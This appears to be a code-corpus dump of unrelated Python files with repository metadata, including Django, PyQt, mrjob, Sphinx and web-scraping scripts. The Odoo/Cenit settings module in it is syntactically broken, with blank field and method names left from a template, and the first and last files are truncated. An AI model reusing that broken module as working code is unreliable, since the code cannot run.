GtmWideipSetV11List = self.__GtmConfigV11.GtmSet.items()
for (keys, value) in GtmWideipSetV10List:
if keys.find('-wideippool') == -1:
continue
else:
for GtmPoolName in GtmPoolNameList:
if value == GtmPoolName:
WideipName.append(keys.split('-wideippool')[0])
for (keys, value) in GtmWideipSetV11List:
if keys.find('-wideippool') == -1:
continue
else:
for GtmPoolName in GtmPoolNameList:
if value == GtmPoolName:
WideipName.append(keys.split('-wideippool')[0])
WideipName = list(set(WideipName))
return WideipName
####input an IP , to get the VS:0 we need to create some command
def __SearchIpToVsZero(self, Ip):
for value in self.__SearchIpToVsV11(Ip):
if value.split(':')[1] == '0':
break
return value.split(':')[0]
####get ltm monitor list
####def __Get
| [
"[email protected]"
] | |
b9aa5d8831498274255a63071c2658ecd43f0335 | aae994a76b683db92ba6a09c3ff8c0922c981ca3 | /channels-example/notifier/serializers.py | df05982681097c0c217c5276a239ad9129c86bb7 | [] | no_license | MerinRose123/python_django_notification | 8b84e2412c640d2d9703afd7b47cca13413d0c70 | 3a1082ac336c6e5b5c3ae0ae1efe8db4aa3c67e8 | refs/heads/master | 2022-11-06T14:56:32.308138 | 2020-12-29T06:23:35 | 2020-12-29T06:23:35 | 204,337,137 | 0 | 0 | null | 2022-11-04T19:36:59 | 2019-08-25T18:57:42 | JavaScript | UTF-8 | Python | false | false | 812 | py | from rest_framework import serializers
from rest_framework.validators import UniqueValidator
from django.contrib.auth.models import User
class UserSerializer(serializers.ModelSerializer):
email = serializers.EmailField(
required=True,
validators=[UniqueValidator(queryset=User.objects.all())]
)
username = serializers.CharField(
max_length=32,
validators=[UniqueValidator(queryset=User.objects.all())]
)
password = serializers.CharField(min_length=8, write_only=True)
def create(self, validated_data):
user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])
return user
class Meta:
model = User
fields = ('id', 'username', 'email', 'password') | [
"[email protected]"
] | |
180d5f73e5579b1c35d5fbc01c5cf62c994d3f21 | 6df4bdb2ab23ea3281defb804924574c2e0b51b9 | /pycharm/Project1/power_set.py | 5ece86f0dcddc5a1548d2291655c123b0963c0cf | [] | no_license | AndroZa0812/python_ml_notebook | e3d876fcbb09fc0a2db09bb0679989112441bcfa | 1224049f5c62da6915769dd8fec8eab73de45d96 | refs/heads/master | 2020-06-11T10:03:14.381852 | 2019-06-27T13:59:47 | 2019-06-27T13:59:47 | 193,925,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | def power_set(s):
if len(s) == 0:
yield set(set())
return
item = s.pop()
subsets_without_item = power_set(s)
for subset in subsets_without_item:
yield subset
new_subset = set(subset)
new_subset.add(item)
yield new_subset
my_set = {1, 3, 6}
for s in power_set(my_set):
print(s)
| [
"[email protected]"
] | |
33b29ac765433248dcb4c90c89b722b5ee8df584 | 03ac4592dd2a54c792273afdd5c9a8f547e40565 | /ordwebapp/tarjetas/migrations/0003_auto_20200522_2107.py | e9ca5434530a4f497084d795fbbb859d4e370151 | [] | no_license | Roninjc/norskord | d49dd3f1ab28731a72b88b89c94c36473a0ff1cd | 997e182b837d6ac85c3d0f6b887eea8d31aa55d5 | refs/heads/master | 2023-08-01T03:25:16.441602 | 2021-09-19T21:52:01 | 2021-09-19T21:52:01 | 408,240,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | # Generated by Django 3.0.4 on 2020-05-22 19:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tarjetas', '0002_auto_20200522_2100'),
]
operations = [
migrations.RemoveField(
model_name='verbsfeatures',
name='norwegian',
),
migrations.DeleteModel(
name='NounsFeatures',
),
migrations.DeleteModel(
name='Ordforrad',
),
migrations.DeleteModel(
name='VerbsFeatures',
),
]
| [
"[email protected]"
] | |
9c9f4d8294f3d0a807f98c70ff94b6f63a87f38a | 2b15539963c5111bff1842cd73880a7ba30d3591 | /RasterPixelCountStat/help/source/conf.py | 4e5c09351f9b0db4f3109affa2cda745c96c801e | [] | no_license | mangowoong/qgis_rasterpixelcountstat_plugin | 44c18aa46ef40d7f629407702b912560f174f6e3 | 7cc4e4d89ed6aaabd799e806402a32503adc2447 | refs/heads/master | 2021-01-23T22:06:17.543565 | 2014-03-25T12:12:08 | 2014-03-25T12:32:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,152 | py | # -*- coding: utf-8 -*-
#
# rasterpixelcountstat documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 12 17:11:03 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo', 'sphinx.ext.pngmath', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'rasterpixelcountstat'
copyright = u'2013, Kiwoong Kim/MangoSystem Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'templateclassdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'rasterpixelcountstat.tex', u'rasterpixelcountstat Documentation',
u'Kiwoong Kim/MangoSystem Inc.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'templateclass', u'rasterpixelcountstat Documentation',
[u'Kiwoong Kim/MangoSystem Inc.'], 1)
]
| [
"[email protected]"
] | |
e0f11bd247a9501b84bd35851b67e487cb716a26 | 81407be1385564308db7193634a2bb050b4f822e | /the-python-standard-library-by-example/gettext/gettext_app_builtin.py | 4c83ee623903f1b380c489b3d6896e7f8c8b49f8 | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 281 | py | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2009 Doug Hellmann All rights reserved.
#
"""
"""
#end_pymotw_header
import gettext
gettext.install('gettext_example', 'locale',
unicode=True, names=['ngettext'])
print _('This message is in the script.')
| [
"[email protected]"
] | |
2f9e06b5629f852ff6e4d8b648aa296bb00bc310 | 2a4e7362819b725cb905c171f0bd69e922f2f71a | /python-venv/lib/python2.7/site-packages/mrjob/examples/mr_jar_step_example.py | 36dc1af41369ece780f8600bb04ec320ae2bf0cf | [] | no_license | adityagc/CS-109-Data-science | e1aac95c5216d28fce42ca35efa4c115c5bf56b6 | 359e200f6ef3d5232608306c4b30841727514a00 | refs/heads/master | 2022-11-15T20:57:51.662164 | 2018-07-15T15:52:50 | 2018-07-15T15:52:50 | 135,188,380 | 0 | 2 | null | 2022-11-03T16:22:52 | 2018-05-28T17:04:33 | Python | UTF-8 | Python | false | false | 2,974 | py | # Copyright 2013 David Marin
# Copyright 2016 Yelp
# Copyright 2018 Yelp and Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple example of linking a hadoop jar with a Python step. This
calculates the frequency of various word frequencies in a text file.
This example works out-of-the box on EMR and Google Cloud Dataproc.
This also only works on a single input path/directory, due to limitations
of the example jar.
"""
from mrjob.job import MRJob
from mrjob.protocol import RawProtocol
from mrjob.step import INPUT
from mrjob.step import JarStep
from mrjob.step import MRStep
from mrjob.step import OUTPUT
# use the file:// trick to access a jar hosted on the cloud
_RUNNER_TO_EXAMPLES_JAR = dict(
dataproc='file:///usr/lib/hadoop-mapreduce/hadoop-mapreduce-examples.jar',
emr='file:///home/hadoop/hadoop-examples.jar',
)
_WORDCOUNT_MAIN_CLASS = 'org.apache.hadoop.examples.WordCount'
class MRJarStepExample(MRJob):
"""A contrived example that runs wordcount from the hadoop example
jar, and then does a frequency count of the frequencies."""
def configure_args(self):
super(MRJarStepExample, self).configure_args()
self.add_passthru_arg(
'--use-main-class', dest='use_main_class',
default=False, action='store_true')
self.pass_arg_through('--runner')
def steps(self):
jar = _RUNNER_TO_EXAMPLES_JAR[self.options.runner]
if self.options.use_main_class:
jar_step = JarStep(
jar=jar,
args=[INPUT, OUTPUT],
main_class=_WORDCOUNT_MAIN_CLASS,
)
else:
jar_step = JarStep(
jar=jar,
args=['wordcount', INPUT, OUTPUT],
)
return [
jar_step,
MRStep(
mapper=self.mapper,
combiner=self.reducer,
reducer=self.reducer,
)
]
def mapper(self, key, freq):
yield int(freq), 1
def reducer(self, freq, counts):
yield freq, sum(counts)
def pick_protocols(self, step_num, step_type):
"""Use RawProtocol to read output from the jar."""
read, write = super(MRJarStepExample, self).pick_protocols(
step_num, step_type)
if (step_num, step_type) == (1, 'mapper'):
read = RawProtocol().read
return read, write
if __name__ == '__main__':
MRJarStepExample.run()
| [
"[email protected]"
] | |
dc01cdd99c347bd0942b58121f69fb3ab51dc1b4 | b25d9132796d4e5996cac6305a7fba748ba2608f | /src/cab_service/urls.py | 9ba0f8a93aacedeaec2f9348f29d8cfd3013d0a3 | [] | no_license | gouravtulsani/Cabapp_backend | 8228053178dd572ac817cadb823ffd06be64f77e | e8a4a498e36e3101738cb866f5bc624291dc4f03 | refs/heads/master | 2020-06-03T14:03:27.397192 | 2018-11-13T14:51:09 | 2019-01-23T09:58:20 | 191,596,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | """cab_service URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('api/', include('cab_app.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
d7b05238b67662fd441e4df6933439ac26248aff | 13c3028d52bdb7a647921b52367a9c804e07cc25 | /epyseg/ta/database/sql_column_name_dialog.py | c8a790bf9dc3c7b94ff5323f44fe120a199f2d07 | [
"Apache-2.0",
"MPL-2.0",
"HPND",
"BSD-3-Clause",
"GPL-3.0-only"
] | permissive | baigouy/EPySeg | 8b1a062f5e88405ca07bd33c6427686182bdae9d | 5ce46ce981c7607c74d9a8f82ef942b207bdb210 | refs/heads/master | 2022-07-26T10:30:41.056239 | 2022-05-24T13:03:50 | 2022-05-24T13:03:50 | 272,421,806 | 19 | 5 | BSD-3-Clause | 2022-05-23T08:27:41 | 2020-06-15T11:34:48 | Python | UTF-8 | Python | false | false | 4,736 | py | # enter a SQL col name --> if name is not valid then forget about it...
# maybe also need enter the type of the new column --> ????
import sys
from PyQt5 import QtCore
from PyQt5.QtWidgets import QDialog, QPlainTextEdit, QVBoxLayout, QApplication, QDialogButtonBox, QSpinBox, QLabel, \
QLineEdit, QComboBox
import re
# NULL. The value is a NULL value.
# INTEGER. The value is a signed integer, stored in 1, 2, 3, 4, 6, or 8 bytes depending on the magnitude of the value.
# REAL. The value is a floating point value, stored as an 8-byte IEEE floating point number.
# TEXT. The value is a text string, stored using the database encoding (UTF-8, UTF-16BE or UTF-16LE).
# BLOB
class SQL_column_name_and_type(QDialog):
def __init__(self, parent=None, title=None, existing_column_name=None):
super(SQL_column_name_and_type, self).__init__(parent)
if title is not None:
self.setWindowTitle(title)
self.existing_column_name = existing_column_name
if isinstance(self.existing_column_name, list):
self.existing_column_name = [name.lower() for name in self.existing_column_name]
layout = QVBoxLayout()
label = QLabel('Please enter a column name that is not in the table.\nThe name should contain no space')
layout.addWidget(label)
self.column_name = QLineEdit()
self.column_name.textChanged.connect(self.column_name_changed)
layout.addWidget(self.column_name)
self.type = QComboBox()
self.type.addItem('REAL')
self.type.addItem('INTEGER')
self.type.addItem('TEXT')
self.type.addItem('BLOB')
layout.addWidget(self.type)
# OK and Cancel buttons
self.buttons = QDialogButtonBox(
QDialogButtonBox.Ok | QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal, self)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.buttons.button( QDialogButtonBox.Ok).setEnabled(False)
layout.addWidget(self.buttons)
self.setLayout(layout)
def column_name_changed(self):
if self.is_text_valid():
self.buttons.button(QDialogButtonBox.Ok).setEnabled(True)
else:
self.buttons.button(QDialogButtonBox.Ok).setEnabled(False)
# TODO --> need also check that the column does not exist...
def is_text_valid(self):
# print(self.column_name.text().isalnum()) # not good because excludes _
# print(self.column_name.text().lower(), self.existing_column_name, self.column_name.text().lower() in self.existing_column_name)
if self.existing_column_name is not None:
if self.column_name.text().lower() in self.existing_column_name:
return False
# this is a regex to check whether the column name is ok
if re.findall(r'^[a-zA-Z_][a-zA-Z0-9_]*$', self.column_name.text()):
return True
return False
@staticmethod
def get_value(parent=None, title=None, existing_column_name=None):
dialog = SQL_column_name_and_type(parent=parent, title=title, existing_column_name=existing_column_name)
result = dialog.exec_()
values = [dialog.column_name.text(), dialog.type.currentText()]
return (values, result == QDialog.Accepted)
if __name__ == '__main__':
if False:
import sys
# txt = 'thuis is a test'
txt = 'thuis_is_a_test'
# txt = 'thuis_is.a_test'
# txt = 'thuis_is a_test'
# txt = 'thuis_is99a_test'
# txt = ' '
# txt = ''
# if ''.join(e for e in string if e.isalnum())
# if txt.isalnum():
# print(True)
# else:
# print(False)
# r1 = re.findall(r'[^\s]+',txt)
# regex for valid sql column name
r1 = re.findall(r'^[a-zA-Z_][a-zA-Z0-9_]*$',txt)
if r1:
print(True)
else:
print(False)
print(r1)
# p = re.compile(r'[^\s]+')
# p = re.compile('\S+')
# p = re.compile(r'[A-Za-z0-9 _.,!"/$]*')
# print(p.match('thuis is a test'))
# if p.match('thuis is a test'):
# print(True)
# else:
# print(False)
sys.exit(0)
app = QApplication(sys.argv)
colnmame_n_type, ok = SQL_column_name_and_type.get_value(title="New Column Name", existing_column_name=['time'])
# form.show()
# text, ok = app.exec_()
# print(form.get_value())
# text, ok = QInputDialog.getText(self, 'Text Input Dialog', 'Enter your SQl command:')
if ok:
# self.le1.setText(str(text))
print(colnmame_n_type)
else:
pass
sys.exit(0) | [
"[email protected]"
] | |
46c4b57372975788f41b6a1641a58fa31c914e8a | 6e3f02ce12ec2e209aa524e4e8f4eabddbc27e11 | /interaction.py | 1b7aa3715607c90574f8ac3e00e786a2a71103d8 | [] | no_license | irmalien/Face-tracking-mouse-movement | 5494f56ee7cbf2530e0186b13edcdb3c72dedd65 | 48031b82d8006a646b5c8af2e28b1549cacc6671 | refs/heads/master | 2022-04-07T15:44:17.233882 | 2020-03-11T19:37:52 | 2020-03-11T19:37:52 | 220,056,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | import pyautogui
class Interaction:
def __init__(self,
output_screen,
keypress_precision=8):
self.keypress_precision = keypress_precision
self.output_screen_width = output_screen['w']
self.output_screen_height = output_screen['h']
def move_keyboard(self, x, y):
width = self.output_screen_width
height = self.output_screen_height
number_of_keypress = self.keypress_precision
x = x - (width / 2)
y = y - (height / 2)
area_x = 'left' if x < 0 else 'right'
area_y = 'up' if y < 0 else 'down'
if area_x == 'left':
steps_x = self.__map(x, -(width / 2), 0, number_of_keypress, 0)
else:
steps_x = self.__map(x, 0, width / 2, 0, number_of_keypress)
steps_x = int(round(steps_x))
for times in range(steps_x):
pyautogui.press(area_x)
if area_y == 'up':
steps_y = self.__map(y, -(height / 2), 0, number_of_keypress, 0)
else:
steps_y = self.__map(y, 0, height / 2, 0, number_of_keypress)
steps_y = int(round(steps_y * 2))
for times in range(steps_y):
pyautogui.press(area_y)
def move_mouse(self, x, y):
pyautogui.moveTo(x, y)
def __map(self, value, start1, stop1, start2, stop2):
newValue = ((value - start1) / (stop1 - start1)) * \
(stop2 - start2) + start2
return newValue
| [
"[email protected]"
] | |
0e04438260526e443c3d7066c4278865b861da3c | 1b19103c7781c31b4042e5404eea46fa90014a70 | /cenit_city_context_api_1_0_0/models/config.py | 33c8075afb540d3e7d9582d3424653c5b110bdd7 | [] | no_license | andhit-r/odoo-integrations | c209797d57320f9e49271967297d3a199bc82ff5 | dee7edc4e9cdcc92e2a8a3e9c34fac94921d32c0 | refs/heads/8.0 | 2021-01-12T05:52:26.101701 | 2016-12-22T03:06:52 | 2016-12-22T03:06:52 | 77,223,257 | 0 | 1 | null | 2016-12-23T12:11:08 | 2016-12-23T12:11:08 | null | UTF-8 | Python | false | false | 3,600 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010, 2014 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp import models, fields
_logger = logging.getLogger(__name__)
COLLECTION_NAME = "city_context_api_1_0_0"
COLLECTION_VERSION = "0.1"
COLLECTION_PARAMS = {
"":'',
}
class CenitIntegrationSettings(models.TransientModel):
_name = "cenit.city_context_api_1_0_0.settings"
_inherit = 'res.config.settings'
############################################################################
# Pull Parameters
############################################################################
= fields.Char('API Key')
############################################################################
# Default Getters
############################################################################
def get_default_(self, cr, uid, ids, context=None):
= self.pool.get('ir.config_parameter').get_param(
cr, uid, 'odoo_cenit.city_context_api_1_0_0.', default=None, context=context
)
return {'': or ''}
############################################################################
# Default Setters
############################################################################
def set_(self, cr, uid, ids, context=None):
config_parameters = self.pool.get('ir.config_parameter')
for record in self.browse(cr, uid, ids, context=context):
config_parameters.set_param (
cr, uid, 'odoo_cenit.city_context_api_1_0_0.', record. or '',
context=context
)
############################################################################
# Actions
############################################################################
def execute(self, cr, uid, ids, context=None):
rc = super(CenitIntegrationSettings, self).execute(
cr, uid, ids, context=context
)
if not context.get('install', False):
return rc
objs = self.browse(cr, uid, ids)
if not objs:
return rc
obj = objs[0]
installer = self.pool.get('cenit.collection.installer')
data = installer.get_collection_data(
cr, uid,
COLLECTION_NAME,
version = COLLECTION_VERSION,
context = context
)
params = {}
for p in data.get('params'):
k = p.get('parameter')
id_ = p.get('id')
value = getattr(obj,COLLECTION_PARAMS.get(k))
params.update ({id_: value})
installer.pull_shared_collection(cr, uid, data.get('id'), params=params, context=context)
return rc
| [
"[email protected]"
] | |
191cfda6ce17fcbe41a235878917ff863d791458 | aa4394485f0148e1860d51cedf12dc4e63b97c0a | /pymodel/samples/Socket/test_stepper.py | 3d2643fd662247b123d53d843dfb42ca04a57351 | [
"LicenseRef-scancode-public-domain"
] | permissive | sergey-lebedev/PyModel | 18b41cfb46ecc1dc7f60aa85f276a7a196660117 | c08696a48e18ae462f0e9348fa63ed4eb71cba4a | refs/heads/master | 2020-12-24T11:11:04.897810 | 2012-09-01T18:18:02 | 2012-09-01T18:18:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | """
Socket tests with stepper
"""
# Subsequent runs use different port numbers
# so output is not completely reproducible
cases = [
('Synchronous: no blocking, next action after send_all is send_return, etc.',
'pmt.py -s 4 -r 6 Socket NoBlockScenario -i Stepper'),
('Synchronous and deterministic: entire message is always sent, then received',
'pmt.py -s 4 -r 6 Socket SendAll NoBlockScenario -i Stepper'),
]
| [
"[email protected]"
] | |
5ead92b975df0c2494154d9582089733f632e2b7 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_17/models/api_client_response.py | 06eace511c986807c009b8503e2df4331826493e | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 3,904 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class ApiClientResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'items': 'list[ApiClient]'
}
attribute_map = {
'items': 'items'
}
required_args = {
}
def __init__(
self,
items=None, # type: List[models.ApiClient]
):
"""
Keyword args:
items (list[ApiClient]): Returns a list of all items after filtering. The values are displayed for each name where meaningful.
"""
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ApiClientResponse`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApiClientResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiClientResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
98d73d768d95e7de81737db0b42d9bb566795dd9 | 04b2e3cfb96c8e2b86f6da89baa5dfccbfb8ec10 | /noon50/extprice.py | bcd17cd69fb1eb5dd7e626d1f344e15c9e7b8280 | [] | no_license | danbikle/pd101 | 812e582c94d7006e54e45c70a05d07bf6b9af7e3 | 883d01b7431d796d6cb5cfbb2cde5113820cc050 | refs/heads/master | 2021-01-01T16:38:56.780737 | 2015-03-19T10:53:11 | 2015-03-19T10:53:11 | 32,036,907 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # /home/ann/pd101/noon50/extprice.py
# This script should extract recent date, prices from html
import bs4
import datetime
import pdb
soup = bs4.BeautifulSoup(open("/tmp/noon50/GSPC.html"))
span0 = soup.find(id="yfs_market_time")
date_l = span0.string.split(",")[:3]
date_s = date_l[1]+date_l[2]
mydt = datetime.datetime.strptime(date_s, " %b %d %Y")
mydt_s = mydt.strftime('%Y-%m-%d')
print('GSPC')
# GSPC needs special handling here:
span1 = soup.find(id="yfs_l10_^gspc")
gspc_price = span1.string.replace(',','')
gspc_s = mydt_s+','+gspc_price+"\n"
gspcf = open('GSPCrecent.csv','w')
gspcf.write(gspc_s)
gspcf.close()
# I should use a loop on the other tkrs
for tkr in ['GLD','TLT','FXI','EFA','XOM','IWM','EEM','MDY','EWJ']:
print(tkr)
ltkr = tkr.lower()
soup = bs4.BeautifulSoup(open("/tmp/noon50/"+tkr+".html"))
span1 = soup.find(id="yfs_l84_"+ltkr)
tkr_price = span1.string.replace(',','')
tkr_s = mydt_s+','+tkr_price+"\n"
tkrf = open(tkr+'recent.csv','w')
tkrf.write(tkr_s)
tkrf.close()
| [
"[email protected]"
] | |
5f18ecc28b0267329f9d79b90a9a9a57bdda2438 | 71736c1a5615a831ce777f4fb27e3bd77ad5d43b | /T4/T3/Produto.py | dcbcfe3b52e20f8759583fd2f90797608bb98151 | [] | no_license | Edu93Reis/aulaPoo-Python | 28e37d3fd38e7d7d4288cb0ae0e8f0f7c4b737c8 | 0c6b997b99c612756e41540a66a10e386588c2b3 | refs/heads/master | 2021-04-26T23:42:30.398947 | 2018-05-18T04:01:24 | 2018-05-18T04:01:24 | 123,842,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | from Imposto import Imposto
class Produto:
def __init__(self,__nome,__preco,__imposto):
self.__nome = __nome
self.__preco = __preco
self.__imposto = __imposto
def getPreco(self):
return self.__preco * self.__imposto.getAliquota()
def getNome(self):
